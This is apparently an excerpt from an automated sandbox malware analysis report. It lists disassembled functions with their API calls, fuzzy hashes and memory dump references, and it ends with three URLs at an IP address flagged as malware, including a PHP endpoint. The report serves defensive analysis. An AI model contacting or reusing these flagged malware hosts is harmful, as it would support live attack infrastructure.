Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 532ebbbe9e739975e569a6110f589adfa97603c909c7d19762687326ecc872eb
Instruction ID: b6bc873907d8422c4f4f47d64184e6a13cf1a692083fc6288086557c9ad81fb7
Opcode Fuzzy Hash: 532ebbbe9e739975e569a6110f589adfa97603c909c7d19762687326ecc872eb
Instruction Fuzzy Hash: 9E91DD72A10108AADB14FBA4DCA6EEE7338AF15300F504169F517B6493EF346A49DB62

Function 6C675C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C675D40
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C675D67
__aulldiv.LIBCMT ref: 6C675DB4
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C675DED

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction ID: d33b4dba655bb99291579b5ea7e7ad6204471695016f9aad492d62ec9b1b7e3c
Opcode Fuzzy Hash: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction Fuzzy Hash: 89518F71E001698FCF08CF69C994AAEBBF1FB85304F198A5DD811A7B50C7307945CB99

Function 000B3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 9e5ad48a235cde5fe3c09ab49f551720bb9d80dc22921c4acf4b2686899154d7
Instruction ID: eda1a0bb6ed2587127ab9ca0c65e0ddb9c628a59ff958a61ca36f218d984a3ae
Opcode Fuzzy Hash: 9e5ad48a235cde5fe3c09ab49f551720bb9d80dc22921c4acf4b2686899154d7
Instruction Fuzzy Hash: 86414F75E14109EFCB14EFA4DC95EEEB7B4AF44304F108018F51676291DB75AA0ACFA2

Function 6C696470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6982BC,?,?), ref: 6C69649B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6964A9

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69653F
free.MOZGLUE(?), ref: 6C69655A

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction ID: 98cb846002616a141ddfcc5cd91472c026677bdcc18c31a34d08c92d525b97ac
Opcode Fuzzy Hash: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction Fuzzy Hash: 223161B5A04305AFD740CF15D88469AB7E4FF89314F00482EE85A97751DB34E919CBDA

Function 000B94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000B94EB

Part of subcall function 000B8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000B951E,00000000), ref: 000B8D5B
Part of subcall function 000B8D50: RtlAllocateHeap.NTDLL(00000000), ref: 000B8D62
Part of subcall function 000B8D50: wsprintfW.USER32 ref: 000B8D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 000B95AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 000B95C9
CloseHandle.KERNEL32(00000000), ref: 000B95D6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: d49ef179f0276a1d1092d0e045936fab1f638b9b181ab376709db5a96127bbc3
Instruction ID: 8e76e01775868b0fde240f5f32a7282eadbf1d604650745fe70492ecd6d59c32
Opcode Fuzzy Hash: d49ef179f0276a1d1092d0e045936fab1f638b9b181ab376709db5a96127bbc3
Instruction Fuzzy Hash: E2310C71E4024CAFDB14DBE0DD89BEDB7B8EF44700F104559E606AE184DB74AA89CB52

Function 6C66B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C66B4F5
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B502
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B542
free.MOZGLUE(?), ref: 6C66B578

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction ID: f8c6926e3cb4d4af112b9870dfa7403b397d49b61d05b120268176a51f4f12c6
Opcode Fuzzy Hash: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction Fuzzy Hash: 85110330A04B41C7D321CF2AC8407A5B3B0FFDA319F14970AE84953E02EBB0B5C5879A

Function 000B7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000C0E00,00000000,?), ref: 000B79B0
RtlAllocateHeap.NTDLL(00000000), ref: 000B79B7
GetLocalTime.KERNEL32(?,?,?,?,?,000C0E00,00000000,?), ref: 000B79C4
wsprintfA.USER32 ref: 000B79F3

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 8f19ecdded688c36a321df587ad90042cafbed52042d27242d2a05936e282c0d
Instruction ID: fcc0399d8c34699a5f8899f464cb31c18214d1b52d74856e5f05a0705c77abb9
Opcode Fuzzy Hash: 8f19ecdded688c36a321df587ad90042cafbed52042d27242d2a05936e282c0d
Instruction Fuzzy Hash: D5112AB2944158ABCB14DFC9ED89BBEB7F8FB4CB11F10421AF605A6280E3395940C7B1

Function 000B92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(000B3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,000B3AEE,?), ref: 000B92FC
GetFileSizeEx.KERNEL32(000000FF,000B3AEE), ref: 000B9319
CloseHandle.KERNEL32(000000FF), ref: 000B9327

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 148c4469686672f47bdc741ca0e72f1455dba73d6608eb26e57ee270f2467c3b
Instruction ID: 5f91effa7268155e9faf540359265f5e63305929039030972427db56c22a273a
Opcode Fuzzy Hash: 148c4469686672f47bdc741ca0e72f1455dba73d6608eb26e57ee270f2467c3b
Instruction Fuzzy Hash: E8F03C75E44208BBDB10DBB0EC49B9EB7F9AB48710F10C254B655AB2C0D670A7018B50

Function 000BC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 000BC74E

Part of subcall function 000BBF9F: __amsg_exit.LIBCMT ref: 000BBFAF

__getptd.LIBCMT ref: 000BC765
__amsg_exit.LIBCMT ref: 000BC773
__updatetlocinfoEx_nolock.LIBCMT ref: 000BC797

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: f0a2e0982b3aa13e0f4412f7d014239250bfcbb2dae9b1487b52eca824913432
Instruction ID: d5fab34aaa67fd3b5e924a89a63b18ae2ef4b13e6ab559a9eb48c11068ce4532
Opcode Fuzzy Hash: f0a2e0982b3aa13e0f4412f7d014239250bfcbb2dae9b1487b52eca824913432
Instruction Fuzzy Hash: 11F0B432A487019FF761BBB89807FED33E06F00721F244159F454A61D3CFA459409E56

Function 6C65BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C65BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65BE8F

Strings

0, xrefs: 6C65BE5B

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction ID: 5aff77c52a83a249f610f6a40117f5f17253505299baa17352f2cf3b02d9aadf
Opcode Fuzzy Hash: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction Fuzzy Hash: 6F41B171A09745CFC301CF28C481A9BB7F4AFCA388F544B1DF985A7611D730E9698B8A

Function 6C693CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693D19
mozalloc_abort.MOZGLUE(?), ref: 6C693D6C

Strings

d, xrefs: 6C693D58

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction ID: ae81405fb39a1e9092750637fc88ed10a7b0fe2e72f912b9bd23e2162f856e3d
Opcode Fuzzy Hash: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction Fuzzy Hash: 8111C435E0468997DB008F6ACC644EDB7B5EF86318F458229DD4997622EB30A688C398

Function 6C666C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C42

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C58

Strings

0Kil, xrefs: 6C666C33, 6C666C41, 6C666C57

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kil
API String ID: 1967447596-1570486273
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 47a2848e409718a8f1d8a2683fe2594ab049f9b896a105d641ef50186a662689
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: F4E086F1A10D455B9F08D97FAC0956A71C88B553AC7044A35E823C6FC8FAB4E550815F

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

